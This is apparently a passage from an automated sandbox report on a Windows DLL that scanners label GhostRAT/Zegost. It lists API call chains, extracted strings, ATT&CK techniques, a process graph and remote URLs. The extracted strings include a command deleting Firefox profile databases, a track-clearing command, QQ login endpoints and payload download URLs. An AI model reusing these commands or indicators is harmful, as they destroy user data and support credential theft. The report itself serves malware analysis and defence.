                  Source: C:\Windows\System32\loaddll32.exeCode function: 5_2_10009B60 FindFirstFileA,FindClose,FindClose,5_2_10009B60
                  Source: C:\Windows\System32\loaddll32.exeCode function: 5_2_10009C40 FindFirstFileA,FindClose,CloseHandle,CreateFileA,5_2_10009C40
                  Source: C:\Windows\System32\loaddll32.exeCode function: 5_2_1000BD50 ?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z,?_Grow@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAE_NI_N@Z,?_Eos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEXI@Z,?_Xran@std@@YAXXZ,?_Freeze@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEXXZ,?append@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ID@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,?_C@?1??_Nullstr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@CAPBDXZ@4DB,?_C@?1??_Nullstr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@CAPBDXZ@4DB,FindFirstFileA,?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z,?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z,_strcmpi,DeleteFileA,_strcmpi,_strcmpi,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,?_C@?1??_Nullstr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@CAPBDXZ@4DB,?_C@?1??_Nullstr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@CAPBDXZ@4DB,#825,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,?_C@?1??_Nullstr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@CAPBDXZ@4DB,?_C@?1??_Nullstr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@CAPBDXZ@4DB,DeleteFileA,#825,FindNextFileA,FindClose,RemoveDirectoryA,#825,5_2_1000BD50
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_10009080 lstrlenA,wsprintfA,FindFirstFileA,LocalAlloc,LocalReAlloc,lstrlenA,FindNextFileA,LocalFree,FindClose,9_2_10009080
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_100092A0 lstrlenA,wsprintfA,wsprintfA,FindFirstFileA,wsprintfA,wsprintfA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,9_2_100092A0
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_100097D0 lstrlenA,wsprintfA,wsprintfA,FindFirstFileA,wsprintfA,wsprintfA,?_Grow@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAE_NI_N@Z,#823,#825,wsprintfA,FindNextFileA,FindClose,9_2_100097D0
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_1002AB10 lstrcatA,lstrcatA,lstrcatA,FindFirstFileA,GetPrivateProfileStringA,lstrlenA,strstr,GetPrivateProfileStringA,lstrlenA,lstrlenA,LocalSize,LocalReAlloc,lstrlenA,lstrlenA,lstrlenA,lstrlenA,FindNextFileA,FindClose,9_2_1002AB10
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_10009B60 FindFirstFileA,FindClose,FindClose,9_2_10009B60
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_10009C40 FindFirstFileA,FindClose,CloseHandle,CreateFileA,9_2_10009C40
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_1000BD50 ?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z,?_Grow@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAE_NI_N@Z,?_Eos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEXI@Z,?_Xran@std@@YAXXZ,?_Freeze@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEXXZ,?append@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ID@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,?_C@?1??_Nullstr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@CAPBDXZ@4DB,?_C@?1??_Nullstr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@CAPBDXZ@4DB,FindFirstFileA,?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z,?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z,_strcmpi,DeleteFileA,_strcmpi,_strcmpi,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,?_C@?1??_Nullstr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@CAPBDXZ@4DB,?_C@?1??_Nullstr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@CAPBDXZ@4DB,#825,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,?_C@?1??_Nullstr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@CAPBDXZ@4DB,?_C@?1??_Nullstr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@CAPBDXZ@4DB,DeleteFileA,#825,FindNextFileA,FindClose,RemoveDirectoryA,#825,9_2_1000BD50
                  Source: C:\Windows\System32\loaddll32.exeCode function: 5_2_10008E50 GetLogicalDriveStringsA,GetUserNameA,_strcmpi,SHGetFolderPathA,CloseHandle,lstrlenA,lstrlenA,lstrlenA,GetVolumeInformationA,SHGetFileInfoA,lstrlenA,lstrlenA,GetDiskFreeSpaceExA,GetDriveTypeA,lstrlenA,5_2_10008E50
                  Source: C:\Windows\System32\loaddll32.exeCode function: 5_2_1001B250 GetTickCount,GetVersionExA,getsockname,GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,GetDriveTypeA,GetDiskFreeSpaceExA,GetTickCount,GetTickCount,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,lstrcpyA,lstrcpyA,lstrcpyA,lstrcpyA,GetLastInputInfo,GetTickCount,_access,lstrcpyA,5_2_1001B250
                  Source: C:\Windows\System32\loaddll32.exeCode function: 5_2_100174C0 BlockInput,BlockInput,BlockInput,5_2_100174C0
                  Source: C:\Windows\System32\loaddll32.exeCode function: 5_2_10014700 LoadLibraryA,GetProcAddress,#823,#823,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,strchr,strncat,strncat,strncat,strchr,RegQueryValueExA,wsprintfA,RegQueryValueExA,strchr,RegEnumKeyExA,wsprintfA,wsprintfA,RegEnumValueA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,lstrcatA,#825,#825,5_2_10014700
                  Source: C:\Windows\System32\loaddll32.exeCode function: 5_2_1000A580 LocalAlloc,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcessHeap,GetProcessHeap,CreateToolhelp32Snapshot,lstrlenA,htons,inet_ntoa,wsprintfA,wsprintfA,htons,inet_ntoa,wsprintfA,lstrcpyA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,LocalSize,LocalReAlloc,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,GetProcessHeap,GetProcAddress,GetProcAddress,GetProcessHeap,GetProcessHeap,HeapFree,FreeLibrary,htons,inet_ntoa,wsprintfA,lstrcpyA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,LocalSize,LocalReAlloc,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,GetProcessHeap,GetProcessHeap,GetProcessHeap,CreateToolhelp32Snapshot,lstrlenA,htons,inet_ntoa,wsprintfA,wsprintfA,htons,inet_ntoa,wsprintfA,lstrcpyA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,LocalSize,LocalReAlloc,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,htons,inet_ntoa,wsprintfA,lstrcpyA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,LocalSize,LocalReAlloc,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,CloseHandle,LocalFree,LocalFree,LocalFree,FreeLibrary,LocalReAlloc,5_2_1000A580

                  HIPS / PFW / Operating System Protection Evasion

                  Source: C:\Windows\System32\loaddll32.exeCode function: 5_2_1000E780 SetEvent,FindWindowA,ShowWindow,FindWindowA,ShowWindow,FindWindowA,FindWindowA,ShowWindow,ShowWindow,FindWindowA,ShowWindow,FindWindowA,FindWindowA,ShowWindow,ShowWindow,FindWindowA,ShowWindow,FindWindowA,SendMessageA,FindWindowA,SendMessageA,mciSendStringA,mciSendStringA,Beep,Sleep,Beep,Sleep,GetForegroundWindow,Beep,Sleep,MoveWindow,GetWindowRect,MoveWindow,Sleep,MoveWindow,Sleep,Beep,SwapMouseButton,SwapMouseButton,5_2_1000E780
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_1000E780 SetEvent,FindWindowA,ShowWindow,FindWindowA,ShowWindow,FindWindowA,FindWindowA,ShowWindow,ShowWindow,FindWindowA,ShowWindow,FindWindowA,FindWindowA,ShowWindow,ShowWindow,FindWindowA,ShowWindow,FindWindowA,SendMessageA,FindWindowA,SendMessageA,mciSendStringA,mciSendStringA,Beep,Sleep,Beep,Sleep,GetForegroundWindow,Beep,Sleep,MoveWindow,GetWindowRect,MoveWindow,Sleep,MoveWindow,Sleep,Beep,SwapMouseButton,SwapMouseButton,9_2_1000E780
                  Source: C:\Windows\System32\loaddll32.exeCode function: CreateToolhelp32Snapshot,Process32First,_strcmpi,OpenProcess,TerminateProcess,_strcmpi,OpenProcess,TerminateProcess,Process32Next,CloseHandle, explorer.exe5_2_1000ED10
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: CreateToolhelp32Snapshot,Process32First,_strcmpi,OpenProcess,TerminateProcess,_strcmpi,OpenProcess,TerminateProcess,Process32Next,CloseHandle, explorer.exe9_2_1000ED10
                  Source: C:\Windows\System32\loaddll32.exeCode function: 5_2_10021410 _access,GetModuleFileNameA,ShellExecuteExA,ShellExecuteExA,GetLastError,exit,_access,_access,Sleep,WinExec,WinExec,_access,WinExec,Sleep,_access,Sleep,CreateThread,CreateThread,CloseHandle,CloseHandle,CreateThread,CloseHandle,Shellex,5_2_10021410
                  Source: C:\Windows\SysWOW64\cmd.exe  Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\l10U7QN0CY.dll",#1
                  Source: C:\Windows\System32\loaddll32.exeCode function: 5_2_1001EFD0 Shellex,#823,lstrcpyA,lstrcpyA,lstrcpyA,lstrcpyA,lstrcpyA,lstrcpyA,lstrcpyA,lstrcpyA,lstrcpyA,lstrcpyA,lstrcpyA,lstrcpyA,GetCurrentThreadId,PostThreadMessageA,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,GetCommandLineA,CreateMutexA,GetLastError,strstr,Sleep,Sleep,OpenSCManagerA,OpenServiceA,CloseServiceHandle,StartServiceA,CloseServiceHandle,CloseServiceHandle,ExitProcess,CloseServiceHandle,CloseServiceHandle,Sleep,Sleep,sprintf,ExitProcess,sprintf,sprintf,GetModuleFileNameA,sprintf,Sleep,sprintf,ExitProcess,Sleep,Sleep,Sleep,Sleep,5_2_1001EFD0
                  Source: C:\Windows\System32\loaddll32.exeCode function: 5_2_100209D0 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,5_2_100209D0
                  Source: loaddll32.exe, loaddll32.exe, 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmp, rundll32.exe, rundll32.exe, 00000009.00000002.3727419433.00000000100FA000.00000008.00000001.01000000.00000004.sdmp, rundll32.exe, 0000000A.00000002.3727406006.00000000100FA000.00000008.00000001.01000000.00000004.sdmpBinary or memory string: Shell_TrayWnd
                  Source: l10U7QN0CY.dllBinary or memory string: Shell_TrayWndProgmanDwmapi.dllDwmIsCompositionEnabledDwmEnableCompositiondwmapi.dllrunasexplorer.exeSeDebugPrivilegecmd.exe /c RunDll32.exe InetCpl.cpl,ClearMyTracksByProcess 255\AppData\Local\Google\Chrome\User Data\DefaultC:\Users\\AppData\Roaming\Microsoft\Skype for DesktopSkype.exedel /s /f %appdata%\Mozilla\Firefox\Profiles\*.dbfirefox.exe\AppData\Roaming\360se6\User Data\Default360se6.exe\AppData\Local\Tencent\QQBrowser\User Data\DefaultQQBrowser.exe\AppData\Roaming\SogouExplorerSogouExplorer.exeBITS -inst.sys\system32\drivers\\sysnative\drivers\SYSTEM\CurrentControlSet\Services\BITSSYSTEM\SetupSYSTEM\SelectMarkTimeSYSTEM\CurrentControlSet\Services\\Registry\Machine\System\CurrentControlSet\Services\%SZwUnloadDriverNTDLL.DLLRtlInitUnicodeStringSeLoadDriverPrivilege
                  Source: loaddll32.exe, loaddll32.exe, 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmp, rundll32.exe, rundll32.exe, 00000009.00000002.3727419433.00000000100FA000.00000008.00000001.01000000.00000004.sdmp, rundll32.exe, 0000000A.00000002.3727406006.00000000100FA000.00000008.00000001.01000000.00000004.sdmpBinary or memory string: Progman
                  Source: C:\Windows\System32\loaddll32.exeCode function: 5_2_100A8230 cpuid 5_2_100A8230
                  Source: C:\Windows\System32\loaddll32.exeCode function: 5_2_10002340 GetWindowLongA,PostQuitMessage,SetWindowLongA,GetModuleHandleA,LoadIconA,SetClassLongA,DestroyWindow,GetDlgItemTextA,GetDlgItem,SetFocus,GetLocalTime,sprintf,GetDlgItem,GetDlgItem,GetWindowTextLengthA,GetWindowTextLengthA,SetWindowTextA,GetWindowTextLengthA,SendMessageA,SendMessageA,SendMessageA,SetDlgItemTextA,GetDlgItem,SetFocus,5_2_10002340
                  Source: C:\Windows\System32\loaddll32.exeCode function: 5_2_1002A260 RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegCloseKey,GetSystemInfo,wsprintfA,wsprintfA,wsprintfA,RegOpenKeyExA,RegQueryValueExA,wsprintfA,RegCloseKey,wsprintfA,GetComputerNameA,GetTickCount,wsprintfA,GetDC,GetDeviceCaps,GetDeviceCaps,GetDeviceCaps,wsprintfA,ReleaseDC,wsprintfA,wsprintfA,wsprintfA,GetCommandLineA,wsprintfA,GetUserNameA,wsprintfA,wsprintfA,FindWindowA,GetWindow,GetWindowTextA,GetWindow,GetClassNameA,GlobalMemoryStatusEx,5_2_1002A260
                  Source: C:\Windows\System32\loaddll32.exeCode function: 5_2_1001E020 GetVersionExA,GetModuleFileNameA,sprintf,WaitForSingleObject,CloseHandle,FindWindowA,FindWindowA,Sleep,FindWindowA,Sleep,FindWindowA,CloseHandle,ExitProcess,5_2_1001E020

                  Lowering of HIPS / PFW / Operating System Security Settings

                  Source: C:\Windows\System32\loaddll32.exeCode function: 5_2_10026980 OpenServiceA 00000000,sharedaccess,000F01FF5_2_10026980

                  Stealing of Sensitive Information

                  Source: Yara matchFile source: l10U7QN0CY.dll, type: SAMPLE
                  Source: Yara matchFile source: 9.2.rundll32.exe.10000000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.loaddll32.exe.10000000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 10.2.rundll32.exe.10000000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: l10U7QN0CY.dll, type: SAMPLE
                  Source: Yara matchFile source: 9.2.rundll32.exe.10000000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.loaddll32.exe.10000000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 10.2.rundll32.exe.10000000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000000A.00000002.3727479077.000000001011E000.00000004.00000001.01000000.00000004.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000009.00000002.3727481281.000000001011E000.00000004.00000001.01000000.00000004.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: loaddll32.exe PID: 5796, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 6528, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 2408, type: MEMORYSTR
                  Source: Yara matchFile source: l10U7QN0CY.dll, type: SAMPLE
                  Source: Yara matchFile source: 9.2.rundll32.exe.10000000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.loaddll32.exe.10000000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 10.2.rundll32.exe.10000000.0.unpack, type: UNPACKEDPE

                  Remote Access Functionality

                  Source: Yara matchFile source: l10U7QN0CY.dll, type: SAMPLE
                  Source: Yara matchFile source: 9.2.rundll32.exe.10000000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.loaddll32.exe.10000000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 10.2.rundll32.exe.10000000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: l10U7QN0CY.dll, type: SAMPLE
                  Source: Yara matchFile source: 9.2.rundll32.exe.10000000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.loaddll32.exe.10000000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 10.2.rundll32.exe.10000000.0.unpack, type: UNPACKEDPE
                  Source: C:\Windows\System32\loaddll32.exeCode function: 5_2_10023650 socket,bind,getsockname,inet_addr,5_2_10023650
                  Source: C:\Windows\System32\loaddll32.exeCode function: 5_2_10023A10 WSAStartup,socket,htons,bind,listen,accept,malloc,accept,malloc,CreateThread,Sleep,CloseHandle,5_2_10023A10
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_10023650 socket,bind,getsockname,inet_addr,9_2_10023650
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_10023A10 WSAStartup,socket,htons,bind,listen,accept,malloc,accept,malloc,CreateThread,Sleep,CloseHandle,9_2_10023A10
                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity InformationAcquire InfrastructureValid Accounts11
                  Native API
                  1
                  DLL Side-Loading
                  1
                  Exploitation for Privilege Escalation
                  11
                  Disable or Modify Tools
                  111
                  Input Capture
                  1
                  System Time Discovery
                  Remote Services1
                  Archive Collected Data
                  1
                  Ingress Tool Transfer
                  Exfiltration Over Other Network Medium1
                  System Shutdown/Reboot
                  CredentialsDomainsDefault Accounts12
                  Service Execution
                  1
                  Create Account
                  1
                  DLL Side-Loading
                  1
                  Deobfuscate/Decode Files or Information
                  LSASS Memory1
                  Account Discovery
                  Remote Desktop Protocol111
                  Input Capture
                  1
                  Encrypted Channel
                  Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain AccountsAt111
                  Windows Service
                  1
                  Access Token Manipulation
                  3
                  Obfuscated Files or Information
                  Security Account Manager1
                  System Service Discovery
                  SMB/Windows Admin Shares3
                  Clipboard Data
                  SteganographyAutomated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal AccountsCron1
                  Bootkit
                  111
                  Windows Service
                  1
                  Timestomp
                  NTDS2
                  File and Directory Discovery
                  Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script23
                  Process Injection
                  1
                  DLL Side-Loading
                  LSA Secrets15
                  System Information Discovery
                  SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                  Masquerading
                  Cached Domain Credentials1
                  Network Share Discovery
                  VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                  Access Token Manipulation
                  DCSync12
                  Security Software Discovery
                  Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job23
                  Process Injection
                  Proc Filesystem12
                  Process Discovery
                  Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                  Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                  Bootkit
                  /etc/passwd and /etc/shadow1
                  Application Window Discovery
                  Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                  IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
                  Rundll32
                  Network Sniffing1
                  System Owner/User Discovery
                  Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                  Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd1
                  Indicator Removal
                  Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 signatures2 2 Behavior Graph ID: 1557658 Sample: l10U7QN0CY.dll Startdate: 18/11/2024 Architecture: WINDOWS Score: 100 40 Malicious sample detected (through community Yara rule) 2->40 42 Antivirus / Scanner detection for submitted sample 2->42 44 Multi AV Scanner detection for submitted file 2->44 46 6 other signatures 2->46 9 loaddll32.exe 1 2->9         started        process3 signatures4 48 Found evasive API chain (may stop execution after checking mutex) 9->48 50 Contains functionality to automate explorer (e.g. start an application) 9->50 52 Contains functionality to infect the boot sector 9->52 54 4 other signatures 9->54 12 rundll32.exe 9->12         started        16 cmd.exe 1 9->16         started        18 conhost.exe 9->18         started        process5 file6 38 C:\Users\Public\Documents\MM\svchos1.exe, PE32 12->38 dropped 56 Found evasive API chain (may stop execution after checking mutex) 12->56 58 Contains functionality to automate explorer (e.g. start an application) 12->58 60 Contains functionality to infect the boot sector 12->60 62 3 other signatures 12->62 20 cmd.exe 2 12->20         started        22 cmd.exe 12->22         started        24 rundll32.exe 1 1 16->24         started        signatures7 process8 process9 26 conhost.exe 20->26         started        28 conhost.exe 22->28         started        30 cmd.exe 24->30         started        32 cmd.exe 24->32         started        process10 34 conhost.exe 30->34         started        36 conhost.exe 32->36         started       

                  Source | Detection | Scanner | Label | Link
                  l10U7QN0CY.dll | 68% | ReversingLabs | Win32.Downloader.GhostRAT |
                  l10U7QN0CY.dll | 100% | Avira | BDS/Zegost.lloamn |
                  l10U7QN0CY.dll | 100% | Joe Sandbox ML | |

                  Source | Detection | Scanner | Label | Link
                  C:\Users\Public\Documents\MM\svchos1.exe | 0% | ReversingLabs | |
                  No Antivirus matches
                  No Antivirus matches
                  Source | Detection | Scanner | Label | Link
                  https://fs-im-kefu.7moor-fs1.com/ly/4d2c3f00-7d4c-11e5-af15-41bf63ae4ea0/1723729291433/7.txt | 0% | Avira URL Cloud | safe |
                  https://fs-im-kefu.7moor-fs1.com/ly/4d2c3f00-7d4c-11e5-af15-41bf63ae4ea0/1728896464326/4.txt | 0% | Avira URL Cloud | safe |
                  https://fs-im-kefu.7moor-fs1.com/ly/4d2c3f00-7d4c-11e5-af15-41bf63ae4ea0/1728896464326/4.txthttps:// | 0% | Avira URL Cloud | safe |
                  No contacted domains info
Name | Source | Malicious | Antivirus Detection | Reputation
https://ssl.ptlogin2.qq.com%s | loaddll32.exe, loaddll32.exe, 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmp, rundll32.exe, rundll32.exe, 00000009.00000002.3727419433.00000000100FA000.00000008.00000001.01000000.00000004.sdmp, rundll32.exe, 0000000A.00000002.3727406006.00000000100FA000.00000008.00000001.01000000.00000004.sdmp, l10U7QN0CY.dll | false | | high
https://fs-im-kefu.7moor-fs1.com/ly/4d2c3f00-7d4c-11e5-af15-41bf63ae4ea0/1723729291433/7.txt | loaddll32.exe, loaddll32.exe, 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmp, rundll32.exe, rundll32.exe, 00000009.00000002.3727481281.000000001011E000.00000004.00000001.01000000.00000004.sdmp, rundll32.exe, 0000000A.00000002.3727479077.000000001011E000.00000004.00000001.01000000.00000004.sdmp, l10U7QN0CY.dll | false | Avira URL Cloud: safe | unknown
https://localhost.ptlogin2.qq.com:4301%sAccept-Language: | loaddll32.exe, rundll32.exe | false | | high
https://xui.ptlogin2.qq.com/cgi-bin/xlogin?appid=715030901&daid=73&hide_close_icon=1&pt_no_auth=1&s_ | rundll32.exe, rundll32.exe, 00000009.00000002.3727419433.00000000100FA000.00000008.00000001.01000000.00000004.sdmp, rundll32.exe, 0000000A.00000002.3727406006.00000000100FA000.00000008.00000001.01000000.00000004.sdmp, l10U7QN0CY.dll | false | | high
https://fs-im-kefu.7moor-fs1.com/ly/4d2c3f00-7d4c-11e5-af15-41bf63ae4ea0/1728896464326/4.txt | loaddll32.exe, loaddll32.exe, 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmp, rundll32.exe, rundll32.exe, 00000009.00000002.3727481281.000000001011E000.00000004.00000001.01000000.00000004.sdmp, rundll32.exe, 0000000A.00000002.3727479077.000000001011E000.00000004.00000001.01000000.00000004.sdmp, l10U7QN0CY.dll | false | Avira URL Cloud: safe | unknown
https://ssl.ptlogin2.qq.com%sAccept-Language: | loaddll32.exe, rundll32.exe | false | | high
http://ptlogin2.qun.qq.com%s | loaddll32.exe, loaddll32.exe, 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmp, rundll32.exe, rundll32.exe, 00000009.00000002.3727419433.00000000100FA000.00000008.00000001.01000000.00000004.sdmp, rundll32.exe, 0000000A.00000002.3727406006.00000000100FA000.00000008.00000001.01000000.00000004.sdmp, l10U7QN0CY.dll | false | | high
http://ptlogin2.qun.qq.com%sAccept-Language: | loaddll32.exe, rundll32.exe | false | | high
http://qun.qq.com%s | loaddll32.exe, loaddll32.exe, 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmp, rundll32.exe, rundll32.exe, 00000009.00000002.3727419433.00000000100FA000.00000008.00000001.01000000.00000004.sdmp, rundll32.exe, 0000000A.00000002.3727406006.00000000100FA000.00000008.00000001.01000000.00000004.sdmp, l10U7QN0CY.dll | false | | high
https://localhost.ptlogin2.qq.com:4301%s | loaddll32.exe, loaddll32.exe, 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmp, rundll32.exe, rundll32.exe, 00000009.00000002.3727419433.00000000100FA000.00000008.00000001.01000000.00000004.sdmp, rundll32.exe, 0000000A.00000002.3727406006.00000000100FA000.00000008.00000001.01000000.00000004.sdmp, l10U7QN0CY.dll | false | | high
http://qun.qq.com%sAccept-Language: | loaddll32.exe, rundll32.exe | false | | high
https://fs-im-kefu.7moor-fs1.com/ly/4d2c3f00-7d4c-11e5-af15-41bf63ae4ea0/1728896464326/4.txthttps:// | loaddll32.exe, 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmp, rundll32.exe, 00000009.00000002.3727481281.000000001011E000.00000004.00000001.01000000.00000004.sdmp, rundll32.exe, 0000000A.00000002.3727479077.000000001011E000.00000004.00000001.01000000.00000004.sdmp, l10U7QN0CY.dll | false | Avira URL Cloud: safe | unknown
                                    No contacted IP infos
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1557658
Start date and time: 2024-11-18 14:17:48 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 7m 35s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 25
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: l10U7QN0CY.dll
renamed because original name is a hash value
